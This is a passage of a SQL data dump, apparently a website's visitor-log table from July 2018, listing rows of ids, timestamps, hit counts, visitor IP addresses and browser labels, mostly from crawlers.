,0,0,'8.29.198.26','other'),(275947,1531944330,1,1,0,0,'54.36.149.28','other'),(275948,1531944677,1,1,0,0,'40.77.167.204','other'),(275949,1531944958,1,1,0,0,'54.36.148.135','other'),(275950,1531945241,1,1,0,0,'54.36.148.133','other'),(275951,1531945282,1,1,0,0,'54.36.148.26','other'),(275952,1531945766,1,1,0,0,'54.36.148.157','other'),(275953,1531945810,1,1,0,0,'54.36.148.172','other'),(275954,1531945993,1,1,0,0,'54.36.148.237','other'),(275955,1531946306,1,1,0,0,'54.36.148.27','other'),(275956,1531946414,1,1,0,0,'54.36.148.80','other'),(275957,1531946453,1,0,1,0,'66.249.69.145',''),(275958,1531946515,1,1,0,0,'54.36.149.76','other'),(275959,1531946871,2,2,0,0,'216.244.66.241','other'),(275960,1531947388,1,1,0,0,'54.36.149.21','other'),(275961,1531947481,1,1,0,0,'46.211.130.82','chrome'),(275962,1531947589,7,7,0,0,'40.77.167.204','other'),(275963,1531947622,1,1,0,0,'40.77.167.205','other'),(275964,1531947637,3,3,0,0,'40.77.167.203','other'),(275965,1531947758,1,1,0,0,'54.36.148.55','other'),(275966,1531947896,1,1,0,0,'54.36.148.41','other'),(275967,1531948405,1,1,0,0,'54.36.148.173','other'),(275968,1531948445,2,2,0,0,'216.244.66.241','other'),(275969,1531948858,1,1,0,0,'54.36.149.25','other'),(275970,1531949178,1,1,0,0,'185.138.230.35','other'),(275971,1531949280,1,1,0,0,'40.77.167.205','other'),(275972,1531949614,1,0,1,0,'66.249.75.153',''),(275973,1531949892,1,1,0,0,'54.36.149.106','other'),(275974,1531949938,1,1,0,0,'54.36.148.28','other'),(275975,1531949975,1,1,0,0,'92.113.4.192','other'),(275976,1531950280,1,1,0,0,'216.244.66.241','other'),(275977,1531950399,1,1,0,0,'54.36.148.143','other'),(275978,1531950402,1,1,0,0,'54.36.148.75','other'),(275979,1531950459,1,1,0,0,'54.36.148.48','other'),(275980,1531950855,1,1,0,0,'141.8.142.74','other'),(275981,1531950896,1,1,0,0,'54.36.149.48','other'),(275982,1531950967,1,1,0,0,'54.36.149.37','other'),(275983,1531951040,2,2,0,0,'78.111.185.108','chrome'),(275984,1531951323,1,1,0,0,'54.36.148.164','other'),(275985,1531951344,1,1,0,0,'8.29.198.27','other'),(275986,1531951952,2,2,0,0,'216.244.66.241','other'),(275987,1531952047,1,1,0,0,'54.36.148.123','other'),(275988,1531952089,1,1,0,0,'54.36.149.99','other'),(275989,1531952312,1,1,0,0,'54.36.148.99','other'),(275990,1531952360,1,1,0,0,'95.163.255.158','other'),(275991,1531952622,1,1,0,0,'54.36.149.104','other'),(275992,1531952624,1,1,0,0,'54.36.149.48','other'),(275993,1531952857,1,1,0,0,'185.138.230.35','other'),(275994,1531953084,1,1,0,0,'91.209.11.236','other'),(275995,1531953472,1,1,0,0,'54.36.148.144','other'),(275996,1531953485,1,1,0,0,'54.36.149.102','other'),(275997,1531953502,1,1,0,0,'216.244.66.241','other'),(275998,1531953560,1,1,0,0,'54.165.59.7','other'),(275999,1531953884,1,1,0,0,'54.36.148.173','other'),(276000,1531953886,1,1,0,0,'54.36.148.149','other'),(276001,1531953985,1,1,0,0,'54.36.149.107','other'),(276002,1531954106,1,1,0,0,'54.36.148.166','other'),(276003,1531954276,1,1,0,0,'141.8.142.74','other'),(276004,1531954698,1,1,0,0,'54.36.148.196','other'),(276005,1531954727,1,1,0,0,'40.77.167.205','other'),(276006,1531954909,1,1,0,0,'54.36.148.187','other'),(276007,1531954917,2,2,0,0,'216.244.66.241','other'),(276008,1531954979,1,1,0,0,'8.29.198.27','other'),(276009,1531955070,1,0,1,0,'66.249.69.143',''),(276010,1531955368,2,0,2,0,'66.249.69.145',''),(276011,1531955419,1,1,0,0,'66.249.69.144','chrome'),(276012,1531955427,1,1,0,0,'66.249.75.155','chrome'),(276013,1531955621,1,1,0,0,'54.36.148.31','other'),(276014,1531955755,1,1,0,0,'54.36.149.48','other'),(276015,1531956096,1,1,0,0,'216.244.66.241','other'),(276016,1531956301,1,1,0,0,'54.36.148.196','other'),(276017,1531956427,1,1,0,0,'54.36.149.21','other'),(276018,1531956475,1,1,0,0,'54.36.148.140','other'),(276019,1531956562,1,1,0,0,'54.36.148.37','other'),(276020,1531956682,1,1,0,0,'54.36.148.40','other'),(276021,1531956743,1,1,0,0,'54.36.148.192','other'),(276022,1531956919,1,1,0,0,'54.36.148.155','other'),(276023,1531957069,1,1,0,0,'54.36.148.181','other'),(276024,1531957181,1,1,0,0,'54.36.148.163','other'),(276025,1531957311,1,1,0,0,'54.36.148.206','other'),(276026,1531957406,1,1,0,0,'54.36.148.126','other'),(276027,1531957639,1,1,0,0,'54.36.149.72','other'),(276028,1531957961,1,0,1,0,'66.249.69.143',''),(276029,1531958153,1,1,0,0,'54.36.148.116','other'),(276030,1531958244,1,1,0,0,'54.36.148.67','other'),(276031,1531958450,1,1,0,0,'54.36.149.5','other'),(276032,1531958815,1,1,0,0,'54.36.148.103','other'),(276033,1531958820,1,1,0,0,'54.36.148.207','other'),(276034,1531959039,1,1,0,0,'54.36.149.51','other'),(276035,1531959045,1,1,0,0,'54.36.148.247','other'),(276036,1531959548,1,1,0,0,'54.36.148.194','other'),(276037,1531959606,1,1,0,0,'54.36.149.14','other'),(276038,1531959748,2,2,0,0,'216.244.66.241','other'),(276039,1531959758,3,0,3,0,'66.249.69.143',''),(276040,1531959897,1,0,1,0,'66.249.69.144',''),(276041,1531960215,1,1,0,0,'54.36.149.16','other'),(276042,1531960706,1,1,0,0,'54.36.149.103','other'),(276043,1531961207,1,1,0,0,'54.36.148.222','other'),(276044,1531961323,1,1,0,0,'54.36.149.66','other'),(276045,1531961483,1,1,0,0,'54.36.149.3','other'),(276046,1531961556,1,1,0,0,'54.36.149.91','other'),(276047,1531962071,1,1,0,0,'216.244.66.241','other'),(276048,1531962147,1,1,0,0,'54.36.148.70','other'),(276049,1531962188,1,1,0,0,'8.29.198.26','other'),(276050,1531962383,1,1,0,0,'40.77.167.203','other'),(276051,1531963146,2,2,0,0,'216.244.66.241','other'),(276052,1531963200,1,1,0,0,'54.36.149.43','other'),(276053,1531963542,1,1,0,0,'52.41.211.72','chrome'),(276054,1531964035,1,1,0,0,'52.53.201.78','chrome'),(276055,1531964139,2,0,2,0,'66.249.69.144',''),(276056,1531964354,1,1,0,0,'54.165.59.7','other'),(276057,1531964436,1,1,0,0,'40.77.167.205','other'),(276058,1531964779,1,1,0,0,'54.36.148.151','other'),(276059,1531965037,1,1,0,0,'180.76.15.155','other'),(276060,1531965044,1,1,0,0,'54.36.148.141','other'),(276061,1531965122,2,2,0,0,'216.244.66.241','other'),(276062,1531965452,1,1,0,0,'46.42.170.154','msie'),(276063,1531965515,1,1,0,0,'54.36.148.92','other'),(276064,1531965556,1,1,0,0,'54.36.149.102','other'),(276065,1531965561,1,1,0,0,'66.249.69.143','chrome'),(276066,1531965683,1,1,0,0,'54.36.148.121','other'),(276067,1531965705,1,0,1,0,'66.249.69.145',''),(276068,1531965810,1,1,0,0,'8.29.198.27','other'),(276069,1531966754,1,1,0,0,'54.36.149.91','other'),(276070,1531966799,1,0,1,0,'66.249.69.144',''),(276071,1531966917,2,2,0,0,'216.244.66.241','other'),(276072,1531966984,1,1,0,0,'54.36.148.134','other'),(276073,1531967288,1,1,0,0,'54.36.148.182','other'),(276074,1531967555,1,1,0,0,'54.36.148.121','other'),(276075,1531967611,1,1,0,0,'66.249.75.157','chrome'),(276076,1531967806,1,1,0,0,'54.36.149.76','other'),(276077,1531967972,1,1,0,0,'54.36.148.101','other'),(276078,1531968312,1,1,0,0,'216.244.66.241','other'),(276079,1531968705,1,0,1,0,'66.249.75.157',''),(276080,1531968938,1,0,1,0,'66.249.69.145',''),(276081,1531969219,1,1,0,0,'54.36.148.173','other'),(276082,1531969651,1,1,0,0,'54.36.148.24','other'),(276083,1531969867,3,3,0,0,'216.244.66.241','other'),(276084,1531970485,1,1,0,0,'54.36.148.241','other'),(276085,1531970888,1,1,0,0,'54.36.148.101','other'),(276086,1531971037,1,1,0,0,'54.36.149.29','other'),(276087,1531971220,1,1,0,0,'54.36.148.159','other'),(276088,1531971637,1,1,0,0,'54.36.148.191','other'),(276089,1531972395,1,0,1,0,'66.249.75.153',''),(276090,1531972413,1,0,1,0,'66.249.69.144',''),(276091,1531972596,1,1,0,0,'54.36.148.79','other'),(276092,1531972800,1,1,0,0,'54.36.148.120','other'),(276093,1531972853,1,1,0,0,'54.36.148.130','other'),(276094,1531972933,1,1,0,0,'54.36.149.20','other'),(276095,1531973041,1,1,0,0,'8.29.198.25','other'),(276096,1531973107,1,1,0,0,'54.36.148.164','other'),(276097,1531973109,1,1,0,0,'54.36.148.116','other'),(276098,1531973250,1,1,0,0,'54.36.149.22','other'),(276099,1531973292,1,1,0,0,'54.36.148.127','other'),(276100,1531973388,1,1,0,0,'54.36.148.223','other'),(276101,1531973518,1,1,0,0,'54.36.148.251','other'),(276102,1531973547,1,0,1,0,'66.249.69.145',''),(276103,1531973612,1,1,0,0,'54.36.148.89','other'),(276104,1531973668,3,3,0,0,'141.8.142.74','other'),(276105,1531973672,2,2,0,0,'178.154.171.88','other'),(276106,1531973942,1,1,0,0,'66.249.69.145','chrome'),(276107,1531974314,1,1,0,0,'91.209.11.236','other'),(276108,1531974726,1,1,0,0,'54.36.148.224','other'),(276109,1531974736,1,1,0,0,'54.36.149.86','other'),(276110,1531975001,1,1,0,0,'54.36.148.68','other'),(276111,1531975094,1,1,0,0,'54.36.149.29','other'),(276112,1531975117,1,1,0,0,'54.36.149.31','other'),(276113,1531975194,1,1,0,0,'54.36.148.202','other'),(276114,1531975700,1,1,0,0,'54.36.148.185','other'),(276115,1531976009,1,1,0,0,'54.36.148.107','other'),(276116,1531976082,1,1,0,0,'54.36.148.90','other'),(276117,1531976156,1,1,0,0,'66.249.69.145','chrome'),(276118,1531976522,1,1,0,0,'54.36.148.215','other'),(276119,1531976657,1,1,0,0,'8.29.198.26','other'),(276120,1531976915,1,1,0,0,'54.36.148.154','other'),(276121,1531977007,1,1,0,0,'54.36.148.54','other'),(276122,1531977207,1,1,0,0,'54.36.149.8','other'),(276123,1531977387,1,1,0,0,'54.36.148.98','other'),(276124,1531977578,1,1,0,0,'216.244.66.241','other'),(276125,1531977830,1,1,0,0,'54.36.149.9','other'),(276126,1531978369,2,2,0,0,'91.196.178.78','chrome'),(276127,1531978637,1,1,0,0,'54.36.148.38','other'),(276128,1531978940,1,1,0,0,'54.36.149.36','other'),(276129,1531978997,1,1,0,0,'54.36.149.78','other'),(276130,1531979120,1,1,0,0,'54.36.148.170','other'),(276131,1531979367,1,1,0,0,'54.36.148.45','other'),(276132,1531979448,1,1,0,0,'178.154.171.88','other'),(276133,1531979616,1,1,0,0,'37.53.137.43','chrome'),(276134,1531980238,1,1,0,0,'54.36.148.49','other'),(276135,1531980568,1,1,0,0,'54.36.149.14','other'),(276136,1531980903,1,1,0,0,'91.124.0.45','chrome'),(276137,1531980946,9,9,0,0,'195.201.23.198','other'),(276138,1531981339,1,1,0,0,'54.36.148.142','other'),(276139,1531981380,3,3,0,0,'91.196.178.169','chrome'),(276140,1531981467,1,1,0,0,'54.36.148.113','other'),(276141,1531981705,1,1,0,0,'54.36.148.30','other'),(276142,1531981742,1,1,0,0,'54.36.148.60','other'),(276143,1531981966,1,1,0,0,'54.36.148.206','other'),(276144,1531982070,1,1,0,0,'91.196.178.189','chrome'),(276145,1531982296,1,1,0,0,'54.36.149.53','other'),(276146,1531982311,2,2,0,0,'91.196.178.169','chrome'),(276147,1531982421,1,1,0,0,'54.36.148.80','other'),(276148,1531982819,1,1,0,0,'54.36.148.34','other'),(276149,1531983288,1,1,0,0,'40.77.167.205','other'),(276150,1531983405,1,1,0,0,'178.95.66.69','chrome'),(276151,1531983476,1,1,0,0,'54.36.148.69','other'),(276152,1531983631,1,1,0,0,'91.196.178.169','chrome'),(276153,1531983664,1,1,0,0,'54.36.149.87','other'),(276154,1531983797,1,0,1,0,'66.249.69.144',''),(276155,1531983886,1,1,0,0,'8.29.198.27','other'),(276156,1531983931,1,1,0,0,'54.36.148.246','other'),(276157,1531984023,1,1,0,0,'54.36.148.37','other'),(276158,1531984103,1,1,0,0,'54.36.148.236','other'),(276159,1531984197,1,1,0,0,'91.124.3.137','chrome'),(276160,1531984273,1,1,0,0,'37.55.93.20','chrome'),(276161,1531984329,1,1,0,0,'54.36.148.179','other'),(276162,1531984626,2,2,0,0,'195.230.119.59','chrome'),(276163,1531984754,1,1,0,0,'178.93.12.211','firefox'),(276164,1531984881,1,1,0,0,'54.36.149.30','other'),(276165,1531984894,1,1,0,0,'195.244.8.101','firefox'),(276166,1531985060,1,1,0,0,'77.222.134.116','chrome'),(276167,1531985062,1,1,0,0,'54.36.148.195','other'),(276168,1531985305,1,1,0,0,'162.210.196.129','other'),(276169,1531985434,1,1,0,0,'5.58.254.86','chrome'),(276170,1531985663,3,3,0,0,'216.244.66.241','other'),(276171,1531985678,1,1,0,0,'54.36.149.89','other'),(276172,1531985733,1,1,0,0,'54.36.149.68','other'),(276173,1531985992,1,1,0,0,'54.36.148.69','other'),(276174,1531985994,1,1,0,0,'46.164.130.92','chrome'),(276175,1531986682,1,1,0,0,'54.36.148.10','other'),(276176,1531986700,1,1,0,0,'54.36.148.230','other'),(276177,1531986792,1,0,1,0,'66.249.69.144',''),(276178,1531986951,1,1,0,0,'37.55.93.20','chrome'),(276179,1531986974,1,1,0,0,'54.36.148.138','other'),(276180,1531987323,1,1,0,0,'66.249.69.145','chrome'),(276181,1531987489,1,1,0,0,'178.154.171.88','other'),(276182,1531987495,1,1,0,0,'8.29.198.27','other'),(276183,1531987516,1,1,0,0,'54.36.149.22','other'),(276184,1531987559,2,2,0,0,'91.196.178.78','chrome'),(276185,1531987560,1,1,0,0,'37.55.39.209','chrome'),(276186,1531987697,1,1,0,0,'91.196.178.169','chrome'),(276187,1531987785,1,1,0,0,'91.124.182.170','firefox'),(276188,1531987892,1,1,0,0,'54.36.149.4','other'),(276189,1531988258,1,1,0,0,'54.36.149.2','other'),(276190,1531988298,3,3,0,0,'216.244.66.241','other'),(276191,1531988393,1,1,0,0,'178.93.12.211','firefox'),(276192,1531988827,1,1,0,0,'91.196.178.131','chrome'),(276193,1531989187,1,1,0,0,'54.36.148.58','other'),(276194,1531989239,1,1,0,0,'54.36.148.148','other'),(276195,1531989333,1,1,0,0,'54.36.149.7','other'),(276196,1531989430,1,1,0,0,'91.124.182.170','firefox'),(276197,1531989772,1,1,0,0,'54.36.148.125','other'),(276198,1531990008,1,1,0,0,'178.93.12.211','firefox'),(276199,1531990614,1,1,0,0,'54.36.149.35','other'),(276200,1531990889,1,1,0,0,'91.196.178.129','firefox'),(276201,1531990962,1,1,0,0,'54.36.148.130','other'),(276202,1531991022,1,1,0,0,'54.36.148.91','other'),(276203,1531991384,1,1,0,0,'54.36.148.15','other'),(276204,1531991400,1,1,0,0,'54.36.148.201','other'),(276205,1531991771,1,1,0,0,'54.36.149.61','other'),(276206,1531991862,1,1,0,0,'91.196.178.169','chrome'),(276207,1531991871,1,1,0,0,'54.36.149.66','other'),(276208,1531991924,1,1,0,0,'54.36.148.166','other'),(276209,1531992068,2,2,0,0,'216.244.66.241','other'),(276210,1531992197,1,1,0,0,'54.36.148.46','other'),(276211,1531992347,1,1,0,0,'54.36.148.221','other'),(276212,1531992828,1,1,0,0,'54.36.148.106','other'),(276213,1531992945,1,1,0,0,'82.202.193.90','firefox'),(276214,1531993133,1,1,0,0,'46.200.163.53','chrome'),(276215,1531993266,1,1,0,0,'216.244.66.241','other'),(276216,1531993619,1,1,0,0,'54.36.149.27','other'),(276217,1531993751,1,1,0,0,'54.36.148.172','other'),(276218,1531994168,1,1,0,0,'54.36.149.18','other'),(276219,1531994539,1,1,0,0,'54.36.148.198','other'),(276220,1531994592,2,2,0,0,'91.196.178.169','chrome'),(276221,1531994617,1,1,0,0,'54.36.148.230','other'),(276222,1531994717,1,1,0,0,'8.29.198.25','other'),(276223,1531994980,1,1,0,0,'54.36.148.63','other'),(276224,1531995152,1,1,0,0,'54.36.149.40','other'),(276225,1531995228,1,1,0,0,'54.36.149.81','other'),(276226,1531995231,1,1,0,0,'54.36.148.143','other'),(276227,1531995490,1,1,0,0,'54.36.148.101','other'),(276228,1531995504,1,1,0,0,'184.94.240.92','firefox'),(276229,1531995915,1,1,0,0,'54.36.148.227','other'),(276230,1531995922,1,1,0,0,'91.196.177.46','chrome'),(276231,1531995940,1,1,0,0,'54.36.149.38','other'),(276232,1531995960,1,1,0,0,'54.36.148.77','other'),(276233,1531996222,4,4,0,0,'216.244.66.241','other'),(276234,1531996223,1,1,0,0,'54.36.149.74','other'),(276235,1531996625,1,1,0,0,'54.36.149.52','other'),(276236,1531996688,1,1,0,0,'54.36.148.228','other'),(276237,1531996766,1,1,0,0,'54.36.148.242','other'),(276238,1531996774,1,1,0,0,'54.36.148.251','other'),(276239,1531996877,1,1,0,0,'54.36.148.29','other'),(276240,1531996918,1,1,0,0,'54.36.148.135','other'),(276241,1531996942,1,1,0,0,'54.36.148.163','other'),(276242,1531997677,1,1,0,0,'54.36.148.141','other'),(276243,1531998018,1,1,0,0,'54.36.149.74','other'),(276244,1531998022,1,1,0,0,'54.36.148.81','other'),(276245,1531998330,1,1,0,0,'8.29.198.25','other'),(276246,1531998592,1,1,0,0,'54.36.148.238','other'),(276247,1531998687,1,1,0,0,'141.8.142.74','other'),(276248,1531998922,2,2,0,0,'91.196.178.169','chrome'),(276249,1531998926,1,1,0,0,'54.36.149.1','other'),(276250,1531999078,1,1,0,0,'54.36.148.63','other'),(276251,1531999181,3,3,0,0,'216.244.66.241','other'),(276252,1531999750,1,1,0,0,'54.36.148.188','other'),(276253,1531999815,2,2,0,0,'91.196.178.78','chrome'),(276254,1531999830,2,2,0,0,'91.196.178.88','chrome'),(276255,1532000065,1,1,0,0,'91.196.178.69','firefox'),(276256,1532000389,1,1,0,0,'54.36.149.54','other'),(276257,1532000522,1,1,0,0,'54.36.148.15','other'),(276258,1532000647,1,1,0,0,'178.154.171.88','other'),(276259,1532001191,1,1,0,0,'91.196.178.169','chrome'),(276260,1532001322,1,1,0,0,'54.36.149.11','other'),(276261,1532001470,1,1,0,0,'54.36.149.56','other'),(276262,1532002148,1,1,0,0,'54.36.148.73','other'),(276263,1532002343,1,1,0,0,'40.77.167.205','other'),(276264,1532002409,1,1,0,0,'54.36.148.83','other'),(276265,1532002489,2,2,0,0,'91.196.178.88','chrome'),(276266,1532002537,2,2,0,0,'216.244.66.241','other'),(276267,1532003241,1,1,0,0,'178.154.171.88','other'),(276268,1532003564,1,1,0,0,'37.9.113.82','other'),(276269,1532003568,1,1,0,0,'40.77.167.203','other'),(276270,1532003578,1,1,0,0,'54.36.149.30','other'),(276271,1532003681,1,1,0,0,'91.124.182.170','chrome'),(276272,1532003817,1,1,0,0,'54.36.149.102','other'),(276273,1532004270,1,1,0,0,'31.13.113.87','other'),(276274,1532004271,1,1,0,0,'31.13.114.147','other'),(276275,1532004456,1,1,0,0,'54.36.149.15','other'),(276276,1532004596,1,1,0,0,'54.36.149.20','other'),(276277,1532004621,1,1,0,0,'91.124.182.170','chrome'),(276278,1532005216,1,1,0,0,'194.54.160.87','chrome'),(276279,1532005456,1,1,0,0,'54.36.149.94','other'),(276280,1532005467,1,1,0,0,'77.244.42.165','chrome'),(276281,1532005553,1,1,0,0,'8.29.198.27','other'),(276282,1532005926,1,1,0,0,'54.36.149.17','other'),(276283,1532006090,1,1,0,0,'54.36.149.43','other'),(276284,1532006525,1,1,0,0,'54.36.149.4','other'),(276285,1532006825,1,1,0,0,'54.36.148.97','other'),(276286,1532006977,1,1,0,0,'54.36.149.28','other'),(276287,1532007056,1,1,0,0,'54.36.148.141','other'),(276288,1532007422,1,1,0,0,'54.36.148.105','other'),(276289,1532007874,1,1,0,0,'40.77.167.204','other'),(276290,1532007898,1,1,0,0,'54.36.148.94','other'),(276291,1532008096,1,1,0,0,'54.36.148.14','other'),(276292,1532008116,2,2,0,0,'91.196.178.78','chrome'),(276293,1532008134,1,1,0,0,'54.36.149.96','other'),(276294,1532008271,1,1,0,0,'216.244.66.241','other'),(276295,1532008385,1,1,0,0,'40.77.167.205','other'),(276296,1532008409,1,1,0,0,'54.36.148.122','other'),(276297,1532008809,1,1,0,0,'91.124.182.170','firefox'),(276298,1532008919,1,1,0,0,'54.36.149.66','other'),(276299,1532009155,1,1,0,0,'8.29.198.26','other'),(276300,1532009156,1,1,0,0,'51.255.65.46','other'),(276301,1532009275,1,1,0,0,'54.36.149.98','other'),(276302,1532009398,2,2,0,0,'216.244.66.241','other'),(276303,1532009999,1,1,0,0,'54.36.148.128','other'),(276304,1532010060,1,1,0,0,'54.36.149.75','other'),(276305,1532010165,2,2,0,0,'91.196.177.46','chrome'),(276306,1532010184,1,1,0,0,'95.132.58.112','firefox'),(276307,1532011310,1,1,0,0,'54.36.148.13','other'),(276308,1532011703,1,1,0,0,'54.36.149.42','other'),(276309,1532011704,1,1,0,0,'54.36.148.164','other'),(276310,1532011924,1,1,0,0,'54.36.149.92','other'),(276311,1532012292,1,1,0,0,'141.8.132.19','other'),(276312,1532012550,1,1,0,0,'54.36.149.106','other'),(276313,1532012582,1,1,0,0,'54.37.158.84','other'),(276314,1532012804,1,1,0,0,'54.36.148.80','other'),(276315,1532013265,1,1,0,0,'54.36.148.60','other'),(276316,1532013398,1,1,0,0,'188.230.43.254','other'),(276317,1532013609,1,1,0,0,'54.36.149.70','other'),(276318,1532013881,1,1,0,0,'54.36.148.234','other'),(276319,1532014323,1,1,0,0,'54.36.148.133','other'),(276320,1532014329,1,1,0,0,'34.238.50.3','chrome'),(276321,1532014443,1,1,0,0,'54.36.148.16','other'),(276322,1532014461,1,1,0,0,'54.36.149.26','other'),(276323,1532014649,1,1,0,0,'216.244.66.241','other'),(276324,1532015271,1,1,0,0,'40.77.167.204','other'),(276325,1532015602,1,1,0,0,'54.36.148.85','other'),(276326,1532015788,1,1,0,0,'54.36.148.71','other'),(276327,1532015858,1,1,0,0,'54.36.149.15','other'),(276328,1532016161,1,1,0,0,'54.36.149.64','other'),(276329,1532016405,1,1,0,0,'8.29.198.25','other'),(276330,1532016644,1,1,0,0,'54.36.149.60','other'),(276331,1532017011,1,1,0,0,'54.36.149.27','other'),(276332,1532017063,1,1,0,0,'54.36.149.45','other'),(276333,1532017136,1,1,0,0,'54.36.149.25','other'),(276334,1532017321,1,1,0,0,'54.36.148.167','other'),(276335,1532017491,1,1,0,0,'54.36.149.96','other'),(276336,1532017615,1,1,0,0,'54.36.148.200','other'),(276337,1532017761,1,1,0,0,'54.36.149.4','other'),(276338,1532017922,1,1,0,0,'54.36.148.170','other'),(276339,1532018384,1,1,0,0,'95.163.255.104','other'),(276340,1532018931,1,1,0,0,'54.36.148.196','other'),(276341,1532019843,1,1,0,0,'54.36.148.200','other'),(276342,1532019996,1,1,0,0,'8.29.198.27','other'),(276343,1532019997,1,1,0,0,'54.36.148.25','other'),(276344,1532020045,1,1,0,0,'54.36.148.203','other'),(276345,1532020087,1,1,0,0,'54.36.148.143','other'),(276346,1532020104,1,1,0,0,'216.244.66.241','other'),(276347,1532020284,1,1,0,0,'54.36.148.255','other'),(276348,1532020603,1,1,0,0,'107.21.1.8','other'),(276349,1532020619,1,1,0,0,'141.8.142.74','other'),(276350,1532020660,1,1,0,0,'54.36.149.47','other'),(276351,1532020746,1,1,0,0,'54.36.148.17','other'),(276352,1532020824,1,1,0,0,'54.36.148.37','other'),(276353,1532021020,1,0,1,0,'66.249.75.157',''),(276354,1532021030,1,1,0,0,'188.230.43.254','other'),(276355,1532021372,1,1,0,0,'54.36.148.152','other'),(276356,1532021415,1,1,0,0,'91.196.178.79','firefox'),(276357,1532022003,3,3,0,0,'216.244.66.241','other'),(276358,1532022132,1,1,0,0,'54.36.149.101','other'),(276359,1532022180,1,1,0,0,'141.8.142.74','other'),(276360,1532022184,1,1,0,0,'178.154.171.88','other'),(276361,1532022568,1,1,0,0,'40.77.167.205','other'),(276362,1532022580,1,1,0,0,'54.36.148.200','other'),(276363,1532023263,1,1,0,0,'54.36.148.120','other'),(276364,1532023283,2,2,0,0,'216.244.66.241','other'),(276365,1532023357,1,1,0,0,'54.36.148.110','other'),(276366,1532023458,1,1,0,0,'54.36.149.70','other'),(276367,1532023468,1,1,0,0,'54.36.148.30','other'),(276368,1532023492,1,1,0,0,'188.230.43.254','other'),(276369,1532023519,1,1,0,0,'212.26.140.60','firefox'),(276370,1532023535,1,1,0,0,'54.36.148.219','other'),(276371,1532023830,1,1,0,0,'54.36.149.107','other'),(276372,1532024215,1,1,0,0,'54.36.149.82','other'),(276373,1532024387,1,1,0,0,'54.36.149.6','other'),(276374,1532024481,2,2,0,0,'91.196.178.70','chrome'),(276375,1532024549,2,2,0,0,'91.196.178.134','chrome'),(276376,1532025134,1,1,0,0,'40.77.167.204','other'),(276377,1532025251,1,1,0,0,'46.161.9.30','firefox'),(276378,1532025349,1,1,0,0,'54.36.149.52','other'),(276379,1532025399,1,1,0,0,'54.36.148.57','other'),(276380,1532025475,1,1,0,0,'54.36.148.87','other'),(276381,1532025892,1,1,0,0,'95.163.255.170','other'),(276382,1532026091,1,1,0,0,'54.36.149.7','other'),(276383,1532026162,1,1,0,0,'35.171.3.46','other'),(276384,1532026417,1,1,0,0,'54.36.149.1','other'),(276385,1532026651,1,1,0,0,'54.36.149.105','other'),(276386,1532026905,2,2,0,0,'92.113.189.235','chrome'),(276387,1532027017,1,1,0,0,'34.205.71.39','other'),(276388,1532027096,1,1,0,0,'54.36.149.16','other'),(276389,1532027143,1,1,0,0,'54.36.149.92','other'),(276390,1532027251,1,1,0,0,'8.29.198.26','other'),(276391,1532027398,1,1,0,0,'40.77.167.202','other'),(276392,1532027806,1,1,0,0,'141.8.142.74','other'),(276393,1532027838,1,1,0,0,'54.36.148.65','other'),(276394,1532027935,1,1,0,0,'35.171.3.46','other'),(276395,1532027967,1,1,0,0,'54.36.148.148','other'),(276396,1532028113,2,2,0,0,'216.244.66.241','other'),(276397,1532028161,1,1,0,0,'54.36.148.55','other'),(276398,1532028404,1,1,0,0,'54.36.148.191','other'),(276399,1532028420,1,1,0,0,'40.77.167.204','other'),(276400,1532028671,2,2,0,0,'52.87.181.231','other'),(276401,1532028916,1,1,0,0,'54.36.148.112','other'),(276402,1532029278,1,1,0,0,'141.8.142.74','other'),(276403,1532029614,1,1,0,0,'54.36.148.239','other'),(276404,1532029615,1,1,0,0,'40.77.167.204','other'),(276405,1532029833,1,1,0,0,'54.36.149.95','other'),(276406,1532029938,1,1,0,0,'40.77.167.203','other'),(276407,1532030103,1,1,0,0,'54.36.148.102','other'),(276408,1532030240,1,1,0,0,'54.36.149.15','other'),(276409,1532030358,2,2,0,0,'216.244.66.241','other'),(276410,1532030536,1,1,0,0,'54.36.148.180','other'),(276411,1532030844,1,1,0,0,'8.29.198.26','other'),(276412,1532030850,1,0,1,0,'66.249.69.144',''),(276413,1532030888,2,2,0,0,'95.132.21.73','chrome'),(276414,1532030897,1,1,0,0,'46.211.98.125','chrome'),(276415,1532031290,1,1,0,0,'54.36.148.252','other'),(276416,1532031463,1,1,0,0,'54.36.148.111','other'),(276417,1532031519,1,1,0,0,'176.120.62.231','chrome'),(276418,1532031671,1,1,0,0,'54.36.149.88','other'),(276419,1532031940,1,1,0,0,'54.36.148.154','other'),(276420,1532032152,1,1,0,0,'40.77.167.203','other'),(276421,1532032173,1,1,0,0,'54.36.149.63','other'),(276422,1532032436,1,1,0,0,'54.36.148.12','other'),(276423,1532032632,1,1,0,0,'54.36.148.225','other'),(276424,1532032793,1,1,0,0,'54.36.148.209','other'),(276425,1532033260,2,2,0,0,'216.244.66.241','other'),(276426,1532033276,1,1,0,0,'54.36.149.20','other'),(276427,1532033900,1,1,0,0,'95.24.30.230','msie'),(276428,1532033983,1,1,0,0,'54.36.148.214','other'),(276429,1532034280,1,1,0,0,'54.36.149.52','other'),(276430,1532034949,1,1,0,0,'54.36.148.90','other'),(276431,1532034998,1,1,0,0,'54.36.149.2','other'),(276432,1532035046,2,2,0,0,'91.196.178.167','chrome'),(276433,1532036140,1,1,0,0,'54.36.149.13','other'),(276434,1532036538,1,1,0,0,'54.36.148.110','other'),(276435,1532036626,1,1,0,0,'54.36.148.227','other'),(276436,1532036694,1,1,0,0,'95.163.255.117','other'),(276437,1532036698,1,1,0,0,'95.163.255.103','other'),(276438,1532036703,1,1,0,0,'95.163.255.108','other'),(276439,1532037095,1,1,0,0,'54.36.148.139','other'),(276440,1532037248,1,1,0,0,'54.36.148.60','other'),(276441,1532037631,1,1,0,0,'54.36.149.86','other'),(276442,1532037725,1,1,0,0,'95.163.255.103','other'),(276443,1532037732,1,1,0,0,'95.163.255.108','other'),(276444,1532037738,1,1,0,0,'54.36.148.212','other'),(276445,1532037748,1,1,0,0,'54.36.149.51','other'),(276446,1532037749,2,2,0,0,'95.163.255.116','other'),(276447,1532037862,1,1,0,0,'216.244.66.241','other'),(276448,1532037879,1,1,0,0,'54.36.148.84','other'),(276449,1532038058,1,1,0,0,'40.77.167.203','other'),(276450,1532038086,1,1,0,0,'8.29.198.25','other'),(276451,1532038872,1,1,0,0,'54.36.149.69','other'),(276452,1532038950,1,1,0,0,'216.244.66.241','other'),(276453,1532039527,1,1,0,0,'54.36.148.120','other'),(276454,1532039674,1,1,0,0,'54.36.148.24','other'),(276455,1532039748,1,1,0,0,'54.36.148.49','other'),(276456,1532039783,1,1,0,0,'54.36.148.158','other'),(276457,1532040205,2,2,0,0,'141.8.142.74','other'),(276458,1532040211,1,0,1,0,'66.249.69.145',''),(276459,1532040608,1,1,0,0,